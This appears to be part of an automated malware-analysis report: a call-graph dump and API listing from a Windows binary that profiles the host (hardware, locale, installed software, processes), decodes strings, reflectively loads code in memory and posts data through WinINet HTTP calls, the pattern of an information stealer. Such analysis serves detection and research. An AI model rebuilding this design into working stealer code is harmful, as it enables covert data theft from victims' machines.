14910->14911 14912 405af9 14911->14912 14913 41a8a0 lstrcpy 14912->14913 14914 405b02 14913->14914 14915 41a9b0 4 API calls 14914->14915 14916 405b21 14915->14916 14917 41a8a0 lstrcpy 14916->14917 14918 405b2a 14917->14918 14919 41a9b0 4 API calls 14918->14919 14920 405b56 14919->14920 14921 41a920 3 API calls 14920->14921 14922 405b5d 14921->14922 14923 41a8a0 lstrcpy 14922->14923 14924 405b66 14923->14924 14925 405b7c InternetConnectA 14924->14925 14925->14881 14926 405bac HttpOpenRequestA 14925->14926 14928 405fb6 InternetCloseHandle 14926->14928 14929 405c0b 14926->14929 14928->14881 14930 41a9b0 4 API calls 14929->14930 14931 405c1f 14930->14931 14932 41a8a0 lstrcpy 14931->14932 14933 405c28 14932->14933 14934 41a920 3 API calls 14933->14934 14935 405c46 14934->14935 14936 41a8a0 lstrcpy 14935->14936 14937 405c4f 14936->14937 14938 41a9b0 4 API calls 14937->14938 14939 405c6e 14938->14939 14940 41a8a0 lstrcpy 14939->14940 14941 405c77 14940->14941 14942 
41a9b0 4 API calls 14941->14942 14943 405c98 14942->14943 14944 41a8a0 lstrcpy 14943->14944 14945 405ca1 14944->14945 14946 41a9b0 4 API calls 14945->14946 14947 405cc1 14946->14947 14948 41a8a0 lstrcpy 14947->14948 14949 405cca 14948->14949 14950 41a9b0 4 API calls 14949->14950 14951 405ce9 14950->14951 14952 41a8a0 lstrcpy 14951->14952 14953 405cf2 14952->14953 14954 41a920 3 API calls 14953->14954 14955 405d10 14954->14955 14956 41a8a0 lstrcpy 14955->14956 14957 405d19 14956->14957 14958 41a9b0 4 API calls 14957->14958 14959 405d38 14958->14959 14960 41a8a0 lstrcpy 14959->14960 14961 405d41 14960->14961 14962 41a9b0 4 API calls 14961->14962 14963 405d60 14962->14963 14964 41a8a0 lstrcpy 14963->14964 14965 405d69 14964->14965 14966 41a920 3 API calls 14965->14966 14967 405d87 14966->14967 14968 41a8a0 lstrcpy 14967->14968 14969 405d90 14968->14969 14970 41a9b0 4 API calls 14969->14970 14971 405daf 14970->14971 14972 41a8a0 lstrcpy 14971->14972 14973 405db8 14972->14973 14974 41a9b0 4 API calls 14973->14974 14975 405dd9 14974->14975 14976 41a8a0 lstrcpy 14975->14976 14977 405de2 14976->14977 14978 41a9b0 4 API calls 14977->14978 14979 405e02 14978->14979 14980 41a8a0 lstrcpy 14979->14980 14981 405e0b 14980->14981 14982 41a9b0 4 API calls 14981->14982 14983 405e2a 14982->14983 14984 41a8a0 lstrcpy 14983->14984 14985 405e33 14984->14985 14986 41a920 3 API calls 14985->14986 14987 405e54 14986->14987 14988 41a8a0 lstrcpy 14987->14988 14989 405e5d 14988->14989 14990 405e70 lstrlen 14989->14990 15786 41aad0 14990->15786 14992 405e81 lstrlen GetProcessHeap RtlAllocateHeap 15787 41aad0 14992->15787 14994 405eae lstrlen 14995 405ebe 14994->14995 14996 405ed7 lstrlen 14995->14996 14997 405ee7 14996->14997 14998 405ef0 lstrlen 14997->14998 14999 405f04 14998->14999 15000 405f1a lstrlen 14999->15000 15788 41aad0 15000->15788 15002 405f2a HttpSendRequestA 15003 405f35 InternetReadFile 15002->15003 15004 405f6a InternetCloseHandle 15003->15004 15008 405f61 15003->15008 
15004->14928 15006 41a9b0 4 API calls 15006->15008 15007 41a8a0 lstrcpy 15007->15008 15008->15003 15008->15004 15008->15006 15008->15007 15010 411077 15009->15010 15011 411151 15010->15011 15012 41a820 lstrlen lstrcpy 15010->15012 15011->13780 15012->15010 15014 410db7 15013->15014 15015 410f17 15014->15015 15016 410ea4 StrCmpCA 15014->15016 15017 410e27 StrCmpCA 15014->15017 15018 410e67 StrCmpCA 15014->15018 15019 41a820 lstrlen lstrcpy 15014->15019 15015->13788 15016->15014 15017->15014 15018->15014 15019->15014 15023 410f67 15020->15023 15021 411044 15021->13796 15022 410fb2 StrCmpCA 15022->15023 15023->15021 15023->15022 15024 41a820 lstrlen lstrcpy 15023->15024 15024->15023 15026 41a740 lstrcpy 15025->15026 15027 411a26 15026->15027 15028 41a9b0 4 API calls 15027->15028 15029 411a37 15028->15029 15030 41a8a0 lstrcpy 15029->15030 15031 411a40 15030->15031 15032 41a9b0 4 API calls 15031->15032 15033 411a5b 15032->15033 15034 41a8a0 lstrcpy 15033->15034 15035 411a64 15034->15035 15036 41a9b0 4 API calls 15035->15036 15037 411a7d 15036->15037 15038 41a8a0 lstrcpy 15037->15038 15039 411a86 15038->15039 15040 41a9b0 4 API calls 15039->15040 15041 411aa1 15040->15041 15042 41a8a0 lstrcpy 15041->15042 15043 411aaa 15042->15043 15044 41a9b0 4 API calls 15043->15044 15045 411ac3 15044->15045 15046 41a8a0 lstrcpy 15045->15046 15047 411acc 15046->15047 15048 41a9b0 4 API calls 15047->15048 15049 411ae7 15048->15049 15050 41a8a0 lstrcpy 15049->15050 15051 411af0 15050->15051 15052 41a9b0 4 API calls 15051->15052 15053 411b09 15052->15053 15054 41a8a0 lstrcpy 15053->15054 15055 411b12 15054->15055 15056 41a9b0 4 API calls 15055->15056 15057 411b2d 15056->15057 15058 41a8a0 lstrcpy 15057->15058 15059 411b36 15058->15059 15060 41a9b0 4 API calls 15059->15060 15061 411b4f 15060->15061 15062 41a8a0 lstrcpy 15061->15062 15063 411b58 15062->15063 15064 41a9b0 4 API calls 15063->15064 15065 411b76 15064->15065 15066 41a8a0 lstrcpy 15065->15066 15067 411b7f 15066->15067 15068 
417500 6 API calls 15067->15068 15069 411b96 15068->15069 15070 41a920 3 API calls 15069->15070 15071 411ba9 15070->15071 15072 41a8a0 lstrcpy 15071->15072 15073 411bb2 15072->15073 15074 41a9b0 4 API calls 15073->15074 15075 411bdc 15074->15075 15076 41a8a0 lstrcpy 15075->15076 15077 411be5 15076->15077 15078 41a9b0 4 API calls 15077->15078 15079 411c05 15078->15079 15080 41a8a0 lstrcpy 15079->15080 15081 411c0e 15080->15081 15789 417690 GetProcessHeap RtlAllocateHeap 15081->15789 15084 41a9b0 4 API calls 15085 411c2e 15084->15085 15086 41a8a0 lstrcpy 15085->15086 15087 411c37 15086->15087 15088 41a9b0 4 API calls 15087->15088 15089 411c56 15088->15089 15090 41a8a0 lstrcpy 15089->15090 15091 411c5f 15090->15091 15092 41a9b0 4 API calls 15091->15092 15093 411c80 15092->15093 15094 41a8a0 lstrcpy 15093->15094 15095 411c89 15094->15095 15796 4177c0 GetCurrentProcess IsWow64Process 15095->15796 15098 41a9b0 4 API calls 15099 411ca9 15098->15099 15100 41a8a0 lstrcpy 15099->15100 15101 411cb2 15100->15101 15102 41a9b0 4 API calls 15101->15102 15103 411cd1 15102->15103 15104 41a8a0 lstrcpy 15103->15104 15105 411cda 15104->15105 15106 41a9b0 4 API calls 15105->15106 15107 411cfb 15106->15107 15108 41a8a0 lstrcpy 15107->15108 15109 411d04 15108->15109 15110 417850 3 API calls 15109->15110 15111 411d14 15110->15111 15112 41a9b0 4 API calls 15111->15112 15113 411d24 15112->15113 15114 41a8a0 lstrcpy 15113->15114 15115 411d2d 15114->15115 15116 41a9b0 4 API calls 15115->15116 15117 411d4c 15116->15117 15118 41a8a0 lstrcpy 15117->15118 15119 411d55 15118->15119 15120 41a9b0 4 API calls 15119->15120 15121 411d75 15120->15121 15122 41a8a0 lstrcpy 15121->15122 15123 411d7e 15122->15123 15124 4178e0 3 API calls 15123->15124 15125 411d8e 15124->15125 15126 41a9b0 4 API calls 15125->15126 15127 411d9e 15126->15127 15128 41a8a0 lstrcpy 15127->15128 15129 411da7 15128->15129 15130 41a9b0 4 API calls 15129->15130 15131 411dc6 15130->15131 15132 41a8a0 lstrcpy 15131->15132 15133 411dcf 
15132->15133 15134 41a9b0 4 API calls 15133->15134 15135 411df0 15134->15135 15136 41a8a0 lstrcpy 15135->15136 15137 411df9 15136->15137 15798 417980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15137->15798 15140 41a9b0 4 API calls 15141 411e19 15140->15141 15142 41a8a0 lstrcpy 15141->15142 15143 411e22 15142->15143 15144 41a9b0 4 API calls 15143->15144 15145 411e41 15144->15145 15146 41a8a0 lstrcpy 15145->15146 15147 411e4a 15146->15147 15148 41a9b0 4 API calls 15147->15148 15149 411e6b 15148->15149 15150 41a8a0 lstrcpy 15149->15150 15151 411e74 15150->15151 15800 417a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15151->15800 15154 41a9b0 4 API calls 15155 411e94 15154->15155 15156 41a8a0 lstrcpy 15155->15156 15157 411e9d 15156->15157 15158 41a9b0 4 API calls 15157->15158 15159 411ebc 15158->15159 15160 41a8a0 lstrcpy 15159->15160 15161 411ec5 15160->15161 15162 41a9b0 4 API calls 15161->15162 15163 411ee5 15162->15163 15164 41a8a0 lstrcpy 15163->15164 15165 411eee 15164->15165 15803 417b00 GetUserDefaultLocaleName 15165->15803 15168 41a9b0 4 API calls 15169 411f0e 15168->15169 15170 41a8a0 lstrcpy 15169->15170 15171 411f17 15170->15171 15172 41a9b0 4 API calls 15171->15172 15173 411f36 15172->15173 15174 41a8a0 lstrcpy 15173->15174 15175 411f3f 15174->15175 15176 41a9b0 4 API calls 15175->15176 15177 411f60 15176->15177 15178 41a8a0 lstrcpy 15177->15178 15179 411f69 15178->15179 15807 417b90 15179->15807 15181 411f80 15182 41a920 3 API calls 15181->15182 15183 411f93 15182->15183 15184 41a8a0 lstrcpy 15183->15184 15185 411f9c 15184->15185 15186 41a9b0 4 API calls 15185->15186 15187 411fc6 15186->15187 15188 41a8a0 lstrcpy 15187->15188 15189 411fcf 15188->15189 15190 41a9b0 4 API calls 15189->15190 15191 411fef 15190->15191 15192 41a8a0 lstrcpy 15191->15192 15193 411ff8 15192->15193 15819 417d80 GetSystemPowerStatus 15193->15819 15196 41a9b0 4 API calls 15197 412018 15196->15197 15198 41a8a0 lstrcpy 15197->15198 15199 412021 15198->15199 15200 
41a9b0 4 API calls 15199->15200 15201 412040 15200->15201 15202 41a8a0 lstrcpy 15201->15202 15203 412049 15202->15203 15204 41a9b0 4 API calls 15203->15204 15205 41206a 15204->15205 15206 41a8a0 lstrcpy 15205->15206 15207 412073 15206->15207 15208 41207e GetCurrentProcessId 15207->15208 15821 419470 OpenProcess 15208->15821 15211 41a920 3 API calls 15212 4120a4 15211->15212 15213 41a8a0 lstrcpy 15212->15213 15214 4120ad 15213->15214 15215 41a9b0 4 API calls 15214->15215 15216 4120d7 15215->15216 15217 41a8a0 lstrcpy 15216->15217 15218 4120e0 15217->15218 15219 41a9b0 4 API calls 15218->15219 15220 412100 15219->15220 15221 41a8a0 lstrcpy 15220->15221 15222 412109 15221->15222 15826 417e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15222->15826 15225 41a9b0 4 API calls 15226 412129 15225->15226 15227 41a8a0 lstrcpy 15226->15227 15228 412132 15227->15228 15229 41a9b0 4 API calls 15228->15229 15230 412151 15229->15230 15231 41a8a0 lstrcpy 15230->15231 15232 41215a 15231->15232 15233 41a9b0 4 API calls 15232->15233 15234 41217b 15233->15234 15235 41a8a0 lstrcpy 15234->15235 15236 412184 15235->15236 15830 417f60 15236->15830 15239 41a9b0 4 API calls 15240 4121a4 15239->15240 15241 41a8a0 lstrcpy 15240->15241 15242 4121ad 15241->15242 15243 41a9b0 4 API calls 15242->15243 15244 4121cc 15243->15244 15245 41a8a0 lstrcpy 15244->15245 15246 4121d5 15245->15246 15247 41a9b0 4 API calls 15246->15247 15248 4121f6 15247->15248 15249 41a8a0 lstrcpy 15248->15249 15250 4121ff 15249->15250 15843 417ed0 GetSystemInfo wsprintfA 15250->15843 15253 41a9b0 4 API calls 15254 41221f 15253->15254 15255 41a8a0 lstrcpy 15254->15255 15256 412228 15255->15256 15257 41a9b0 4 API calls 15256->15257 15258 412247 15257->15258 15259 41a8a0 lstrcpy 15258->15259 15260 412250 15259->15260 15261 41a9b0 4 API calls 15260->15261 15262 412270 15261->15262 15263 41a8a0 lstrcpy 15262->15263 15264 412279 15263->15264 15845 418100 GetProcessHeap RtlAllocateHeap 15264->15845 15267 41a9b0 4 API calls 15268 
412299 15267->15268 15269 41a8a0 lstrcpy 15268->15269 15270 4122a2 15269->15270 15271 41a9b0 4 API calls 15270->15271 15272 4122c1 15271->15272 15273 41a8a0 lstrcpy 15272->15273 15274 4122ca 15273->15274 15275 41a9b0 4 API calls 15274->15275 15276 4122eb 15275->15276 15277 41a8a0 lstrcpy 15276->15277 15278 4122f4 15277->15278 15851 4187c0 15278->15851 15281 41a920 3 API calls 15282 41231e 15281->15282 15283 41a8a0 lstrcpy 15282->15283 15284 412327 15283->15284 15285 41a9b0 4 API calls 15284->15285 15286 412351 15285->15286 15287 41a8a0 lstrcpy 15286->15287 15288 41235a 15287->15288 15289 41a9b0 4 API calls 15288->15289 15290 41237a 15289->15290 15291 41a8a0 lstrcpy 15290->15291 15292 412383 15291->15292 15293 41a9b0 4 API calls 15292->15293 15294 4123a2 15293->15294 15295 41a8a0 lstrcpy 15294->15295 15296 4123ab 15295->15296 15856 4181f0 15296->15856 15298 4123c2 15299 41a920 3 API calls 15298->15299 15300 4123d5 15299->15300 15301 41a8a0 lstrcpy 15300->15301 15302 4123de 15301->15302 15303 41a9b0 4 API calls 15302->15303 15304 41240a 15303->15304 15305 41a8a0 lstrcpy 15304->15305 15306 412413 15305->15306 15307 41a9b0 4 API calls 15306->15307 15308 412432 15307->15308 15309 41a8a0 lstrcpy 15308->15309 15310 41243b 15309->15310 15311 41a9b0 4 API calls 15310->15311 15312 41245c 15311->15312 15313 41a8a0 lstrcpy 15312->15313 15314 412465 15313->15314 15315 41a9b0 4 API calls 15314->15315 15316 412484 15315->15316 15317 41a8a0 lstrcpy 15316->15317 15318 41248d 15317->15318 15319 41a9b0 4 API calls 15318->15319 15320 4124ae 15319->15320 15321 41a8a0 lstrcpy 15320->15321 15322 4124b7 15321->15322 15864 418320 15322->15864 15324 4124d3 15325 41a920 3 API calls 15324->15325 15326 4124e6 15325->15326 15327 41a8a0 lstrcpy 15326->15327 15328 4124ef 15327->15328 15329 41a9b0 4 API calls 15328->15329 15330 412519 15329->15330 15331 41a8a0 lstrcpy 15330->15331 15332 412522 15331->15332 15333 41a9b0 4 API calls 15332->15333 15334 412543 15333->15334 15335 41a8a0 lstrcpy 
15334->15335 15336 41254c 15335->15336 15337 418320 17 API calls 15336->15337 15338 412568 15337->15338 15339 41a920 3 API calls 15338->15339 15340 41257b 15339->15340 15341 41a8a0 lstrcpy 15340->15341 15342 412584 15341->15342 15343 41a9b0 4 API calls 15342->15343 15344 4125ae 15343->15344 15345 41a8a0 lstrcpy 15344->15345 15346 4125b7 15345->15346 15347 41a9b0 4 API calls 15346->15347 15348 4125d6 15347->15348 15349 41a8a0 lstrcpy 15348->15349 15350 4125df 15349->15350 15351 41a9b0 4 API calls 15350->15351 15352 412600 15351->15352 15353 41a8a0 lstrcpy 15352->15353 15354 412609 15353->15354 15900 418680 15354->15900 15356 412620 15357 41a920 3 API calls 15356->15357 15358 412633 15357->15358 15359 41a8a0 lstrcpy 15358->15359 15360 41263c 15359->15360 15361 41265a lstrlen 15360->15361 15362 41266a 15361->15362 15363 41a740 lstrcpy 15362->15363 15364 41267c 15363->15364 15365 401590 lstrcpy 15364->15365 15366 41268d 15365->15366 15910 415190 15366->15910 15368 412699 15368->13800 16098 41aad0 15369->16098 15371 405009 InternetOpenUrlA 15375 405021 15371->15375 15372 4050a0 InternetCloseHandle InternetCloseHandle 15374 4050ec 15372->15374 15373 40502a InternetReadFile 15373->15375 15374->13804 15375->15372 15375->15373 16099 4098d0 15376->16099 15378 410759 15379 410a38 15378->15379 15380 41077d 15378->15380 15381 401590 lstrcpy 15379->15381 15383 410799 StrCmpCA 15380->15383 15382 410a49 15381->15382 16275 410250 15382->16275 15385 410843 15383->15385 15386 4107a8 15383->15386 15389 410865 StrCmpCA 15385->15389 15388 41a7a0 lstrcpy 15386->15388 15390 4107c3 15388->15390 15391 410874 15389->15391 15428 41096b 15389->15428 15392 401590 lstrcpy 15390->15392 15393 41a740 lstrcpy 15391->15393 15394 41080c 15392->15394 15396 410881 15393->15396 15397 41a7a0 lstrcpy 15394->15397 15395 41099c StrCmpCA 15398 4109ab 15395->15398 15417 410a2d 15395->15417 15399 41a9b0 4 API calls 15396->15399 15400 410823 15397->15400 15401 401590 lstrcpy 15398->15401 15402 4108ac 
15399->15402 15403 41a7a0 lstrcpy 15400->15403 15405 4109f4 15401->15405 15406 41a920 3 API calls 15402->15406 15404 41083e 15403->15404 16102 40fb00 15404->16102 15408 41a7a0 lstrcpy 15405->15408 15409 4108b3 15406->15409 15410 410a0d 15408->15410 15411 41a9b0 4 API calls 15409->15411 15412 41a7a0 lstrcpy 15410->15412 15413 4108ba 15411->15413 15414 410a28 15412->15414 15415 41a8a0 lstrcpy 15413->15415 16218 410030 15414->16218 15417->13808 15428->15395 15750 41a7a0 lstrcpy 15749->15750 15751 401683 15750->15751 15752 41a7a0 lstrcpy 15751->15752 15753 401695 15752->15753 15754 41a7a0 lstrcpy 15753->15754 15755 4016a7 15754->15755 15756 41a7a0 lstrcpy 15755->15756 15757 4015a3 15756->15757 15757->14631 15759 4047c6 15758->15759 15760 404838 lstrlen 15759->15760 15784 41aad0 15760->15784 15762 404848 InternetCrackUrlA 15763 404867 15762->15763 15763->14708 15765 41a740 lstrcpy 15764->15765 15766 418b74 15765->15766 15767 41a740 lstrcpy 15766->15767 15768 418b82 GetSystemTime 15767->15768 15770 418b99 15768->15770 15769 41a7a0 lstrcpy 15771 418bfc 15769->15771 15770->15769 15771->14723 15773 41a931 15772->15773 15774 41a988 15773->15774 15776 41a968 lstrcpy lstrcat 15773->15776 15775 41a7a0 lstrcpy 15774->15775 15777 41a994 15775->15777 15776->15774 15777->14726 15778->14841 15780 409af9 LocalAlloc 15779->15780 15781 404eee 15779->15781 15780->15781 15782 409b14 CryptStringToBinaryA 15780->15782 15781->14729 15781->14732 15782->15781 15783 409b39 LocalFree 15782->15783 15783->15781 15784->15762 15785->14851 15786->14992 15787->14994 15788->15002 15917 4177a0 15789->15917 15792 4176c6 RegOpenKeyExA 15794 417704 RegCloseKey 15792->15794 15795 4176e7 RegQueryValueExA 15792->15795 15793 411c1e 15793->15084 15794->15793 15795->15794 15797 411c99 15796->15797 15797->15098 15799 411e09 15798->15799 15799->15140 15801 411e84 15800->15801 15802 417a9a wsprintfA 15800->15802 15801->15154 15802->15801 15804 411efe 15803->15804 15805 417b4d 15803->15805 15804->15168 15924 418d20 
LocalAlloc CharToOemW 15805->15924 15808 41a740 lstrcpy 15807->15808 15809 417bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15808->15809 15812 417c25 15809->15812 15810 417c46 GetLocaleInfoA 15810->15812 15811 417d18 15813 417d28 15811->15813 15814 417d1e LocalFree 15811->15814 15812->15810 15812->15811 15815 41a9b0 lstrcpy lstrlen lstrcpy lstrcat 15812->15815 15818 41a8a0 lstrcpy 15812->15818 15816 41a7a0 lstrcpy 15813->15816 15814->15813 15815->15812 15817 417d37 15816->15817 15817->15181 15818->15812 15820 412008 15819->15820 15820->15196 15822 419493 GetModuleFileNameExA CloseHandle 15821->15822 15823 4194b5 15821->15823 15822->15823 15824 41a740 lstrcpy 15823->15824 15825 412091 15824->15825 15825->15211 15827 412119 15826->15827 15828 417e68 RegQueryValueExA 15826->15828 15827->15225 15829 417e8e RegCloseKey 15828->15829 15829->15827 15831 417fb9 GetLogicalProcessorInformationEx 15830->15831 15832 417fd8 GetLastError 15831->15832 15839 418029 15831->15839 15835 418022 15832->15835 15842 417fe3 15832->15842 15836 412194 15835->15836 15838 4189f0 2 API calls 15835->15838 15836->15239 15837 4189f0 2 API calls 15840 41807b 15837->15840 15838->15836 15839->15837 15840->15835 15841 418084 wsprintfA 15840->15841 15841->15836 15842->15831 15842->15836 15925 4189f0 15842->15925 15928 418a10 GetProcessHeap RtlAllocateHeap 15842->15928 15844 41220f 15843->15844 15844->15253 15846 4189b0 15845->15846 15847 41814d GlobalMemoryStatusEx 15846->15847 15850 418163 __aulldiv 15847->15850 15848 41819b wsprintfA 15849 412289 15848->15849 15849->15267 15850->15848 15852 4187fb GetProcessHeap RtlAllocateHeap wsprintfA 15851->15852 15854 41a740 lstrcpy 15852->15854 15855 41230b 15854->15855 15855->15281 15857 41a740 lstrcpy 15856->15857 15861 418229 15857->15861 15858 418263 15860 41a7a0 lstrcpy 15858->15860 15859 41a9b0 lstrcpy lstrlen lstrcpy lstrcat 15859->15861 15862 4182dc 15860->15862 15861->15858 15861->15859 15863 41a8a0 lstrcpy 15861->15863 15862->15298 
15863->15861 15865 41a740 lstrcpy 15864->15865 15866 41835c RegOpenKeyExA 15865->15866 15867 4183d0 15866->15867 15868 4183ae 15866->15868 15870 418613 RegCloseKey 15867->15870 15871 4183f8 RegEnumKeyExA 15867->15871 15869 41a7a0 lstrcpy 15868->15869 15881 4183bd 15869->15881 15874 41a7a0 lstrcpy 15870->15874 15872 41843f wsprintfA RegOpenKeyExA 15871->15872 15873 41860e 15871->15873 15875 4184c1 RegQueryValueExA 15872->15875 15876 418485 RegCloseKey RegCloseKey 15872->15876 15873->15870 15874->15881 15878 418601 RegCloseKey 15875->15878 15879 4184fa lstrlen 15875->15879 15877 41a7a0 lstrcpy 15876->15877 15877->15881 15878->15873 15879->15878 15880 418510 15879->15880 15882 41a9b0 4 API calls 15880->15882 15881->15324 15883 418527 15882->15883 15884 41a8a0 lstrcpy 15883->15884 15885 418533 15884->15885 15886 41a9b0 4 API calls 15885->15886 15887 418557 15886->15887 15888 41a8a0 lstrcpy 15887->15888 15889 418563 15888->15889 15890 41856e RegQueryValueExA 15889->15890 15890->15878 15891 4185a3 15890->15891 15892 41a9b0 4 API calls 15891->15892 15893 4185ba 15892->15893 15894 41a8a0 lstrcpy 15893->15894 15895 4185c6 15894->15895 15896 41a9b0 4 API calls 15895->15896 15897 4185ea 15896->15897 15898 41a8a0 lstrcpy 15897->15898 15899 4185f6 15898->15899 15899->15878 15901 41a740 lstrcpy 15900->15901 15902 4186bc CreateToolhelp32Snapshot Process32First 15901->15902 15903 4186e8 Process32Next 15902->15903 15904 41875d CloseHandle 15902->15904 15903->15904 15909 4186fd 15903->15909 15905 41a7a0 lstrcpy 15904->15905 15908 418776 15905->15908 15906 41a9b0 lstrcpy lstrlen lstrcpy lstrcat 15906->15909 15907 41a8a0 lstrcpy 15907->15909 15908->15356 15909->15903 15909->15906 15909->15907 15911 41a7a0 lstrcpy 15910->15911 15912 4151b5 15911->15912 15913 401590 lstrcpy 15912->15913 15914 4151c6 15913->15914 15929 405100 15914->15929 15916 4151cf 15916->15368 15920 417720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15917->15920 15919 4176b9 15919->15792 15919->15793 15921 417780 
RegCloseKey 15920->15921 15922 417765 RegQueryValueExA 15920->15922 15923 417793 15921->15923 15922->15921 15923->15919 15924->15804 15926 4189f9 GetProcessHeap HeapFree 15925->15926 15927 418a0c 15925->15927 15926->15927 15927->15842 15928->15842 15930 41a7a0 lstrcpy 15929->15930 15931 405119 15930->15931 15932 4047b0 2 API calls 15931->15932 15933 405125 15932->15933 16089 418ea0 15933->16089 15935 405184 15936 405192 lstrlen 15935->15936 15937 4051a5 15936->15937 15938 418ea0 4 API calls 15937->15938 15939 4051b6 15938->15939 15940 41a740 lstrcpy 15939->15940 15941 4051c9 15940->15941 15942 41a740 lstrcpy 15941->15942 15943 4051d6 15942->15943 15944 41a740 lstrcpy 15943->15944 15945 4051e3 15944->15945 15946 41a740 lstrcpy 15945->15946 15947 4051f0 15946->15947 15948 41a740 lstrcpy 15947->15948 15949 4051fd InternetOpenA StrCmpCA 15948->15949 15950 40522f 15949->15950 15951 4058c4 InternetCloseHandle 15950->15951 15952 418b60 3 API calls 15950->15952 15958 4058d9 codecvt 15951->15958 15953 40524e 15952->15953 15954 41a920 3 API calls 15953->15954 15955 405261 15954->15955 15956 41a8a0 lstrcpy 15955->15956 15957 40526a 15956->15957 15959 41a9b0 4 API calls 15957->15959 15962 41a7a0 lstrcpy 15958->15962 15960 4052ab 15959->15960 15961 41a920 3 API calls 15960->15961 15963 4052b2 15961->15963 15969 405913 15962->15969 15964 41a9b0 4 API calls 15963->15964 15965 4052b9 15964->15965 15966 41a8a0 lstrcpy 15965->15966 15967 4052c2 15966->15967 15968 41a9b0 4 API calls 15967->15968 15970 405303 15968->15970 15969->15916 15971 41a920 3 API calls 15970->15971 15972 40530a 15971->15972 15973 41a8a0 lstrcpy 15972->15973 15974 405313 15973->15974 15975 405329 InternetConnectA 15974->15975 15975->15951 15976 405359 HttpOpenRequestA 15975->15976 15978 4058b7 InternetCloseHandle 15976->15978 15979 4053b7 15976->15979 15978->15951 15980 41a9b0 4 API calls 15979->15980 15981 4053cb 15980->15981 15982 41a8a0 lstrcpy 15981->15982 15983 4053d4 15982->15983 15984 41a920 3 API calls 
15983->15984 15985 4053f2 15984->15985 15986 41a8a0 lstrcpy 15985->15986 15987 4053fb 15986->15987 15988 41a9b0 4 API calls 15987->15988 15989 40541a 15988->15989 15990 41a8a0 lstrcpy 15989->15990 15991 405423 15990->15991 15992 41a9b0 4 API calls 15991->15992 15993 405444 15992->15993 15994 41a8a0 lstrcpy 15993->15994 15995 40544d 15994->15995 15996 41a9b0 4 API calls 15995->15996 15997 40546e 15996->15997 16090 418ead CryptBinaryToStringA 16089->16090 16094 418ea9 16089->16094 16091 418ece GetProcessHeap RtlAllocateHeap 16090->16091 16090->16094 16092 418ef4 codecvt 16091->16092 16091->16094 16093 418f05 CryptBinaryToStringA 16092->16093 16093->16094 16094->15935 16098->15371 16341 409880 16099->16341 16101 4098e1 16101->15378 16103 41a740 lstrcpy 16102->16103 16276 41a740 lstrcpy 16275->16276 16277 410266 16276->16277 16278 418de0 2 API calls 16277->16278 16279 41027b 16278->16279 16280 41a920 3 API calls 16279->16280 16281 41028b 16280->16281 16282 41a8a0 lstrcpy 16281->16282 16283 410294 16282->16283 16284 41a9b0 4 API calls 16283->16284 16342 40988e 16341->16342 16345 406fb0 16342->16345 16344 4098ad codecvt 16344->16101 16348 406d40 16345->16348 16349 406d63 16348->16349 16362 406d59 16348->16362 16364 406530 16349->16364 16353 406dbe 16353->16362 16374 4069b0 16353->16374 16355 406e2a 16356 406ee6 VirtualFree 16355->16356 16358 406ef7 16355->16358 16355->16362 16356->16358 16357 406f41 16361 4189f0 2 API calls 16357->16361 16357->16362 16358->16357 16359 406f26 FreeLibrary 16358->16359 16360 406f38 16358->16360 16359->16358 16363 4189f0 2 API calls 16360->16363 16361->16362 16362->16344 16363->16357 16365 406542 16364->16365 16367 406549 16365->16367 16384 418a10 GetProcessHeap RtlAllocateHeap 16365->16384 16367->16362 16368 406660 16367->16368 16373 40668f VirtualAlloc 16368->16373 16370 406730 16371 406743 VirtualAlloc 16370->16371 16372 40673c 16370->16372 16371->16372 16372->16353 16373->16370 16373->16372 16375 4069c9 16374->16375 16379 4069d5 
16374->16379 16376 406a09 LoadLibraryA 16375->16376 16375->16379 16377 406a32 16376->16377 16376->16379 16382 406ae0 16377->16382 16385 418a10 GetProcessHeap RtlAllocateHeap 16377->16385 16379->16355 16380 406ba8 GetProcAddress 16380->16379 16380->16382 16381 4189f0 2 API calls 16381->16382 16382->16379 16382->16380 16383 406a8b 16383->16379 16383->16381 16384->16367 16385->16383

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 660 419860-419874 call 419750 663 419a93-419af2 LoadLibraryA * 5 660->663 664 41987a-419a8e call 419780 GetProcAddress * 21 660->664 666 419af4-419b08 GetProcAddress 663->666 667 419b0d-419b14 663->667 664->663 666->667 668 419b46-419b4d 667->668 669 419b16-419b41 GetProcAddress * 2 667->669 671 419b68-419b6f 668->671 672 419b4f-419b63 GetProcAddress 668->672 669->668 673 419b71-419b84 GetProcAddress 671->673 674 419b89-419b90 671->674 672->671 673->674 675 419bc1-419bc2 674->675 676 419b92-419bbc GetProcAddress * 2 674->676 676->675
                          APIs
                          • GetProcAddress.KERNEL32(75900000,01280630), ref: 004198A1
                          • GetProcAddress.KERNEL32(75900000,01280798), ref: 004198BA
                          • GetProcAddress.KERNEL32(75900000,01280678), ref: 004198D2
                          • GetProcAddress.KERNEL32(75900000,012806D8), ref: 004198EA
                          • GetProcAddress.KERNEL32(75900000,012805E8), ref: 00419903
                          • GetProcAddress.KERNEL32(75900000,012889B0), ref: 0041991B
                          • GetProcAddress.KERNEL32(75900000,012766C0), ref: 00419933
                          • GetProcAddress.KERNEL32(75900000,01276680), ref: 0041994C
                          • GetProcAddress.KERNEL32(75900000,01280828), ref: 00419964
                          • GetProcAddress.KERNEL32(75900000,01280618), ref: 0041997C
                          • GetProcAddress.KERNEL32(75900000,01280840), ref: 00419995
                          • GetProcAddress.KERNEL32(75900000,01280600), ref: 004199AD
                          • GetProcAddress.KERNEL32(75900000,012767C0), ref: 004199C5
                          • GetProcAddress.KERNEL32(75900000,01280558), ref: 004199DE
                          • GetProcAddress.KERNEL32(75900000,012807B0), ref: 004199F6
                          • GetProcAddress.KERNEL32(75900000,01276740), ref: 00419A0E
                          • GetProcAddress.KERNEL32(75900000,01280648), ref: 00419A27
                          • GetProcAddress.KERNEL32(75900000,01280660), ref: 00419A3F
                          • GetProcAddress.KERNEL32(75900000,01276840), ref: 00419A57
                          • GetProcAddress.KERNEL32(75900000,01280690), ref: 00419A70
                          • GetProcAddress.KERNEL32(75900000,01276860), ref: 00419A88
                          • LoadLibraryA.KERNEL32(012806F0,?,00416A00), ref: 00419A9A
                          • LoadLibraryA.KERNEL32(012806A8,?,00416A00), ref: 00419AAB
                          • LoadLibraryA.KERNEL32(01280720,?,00416A00), ref: 00419ABD
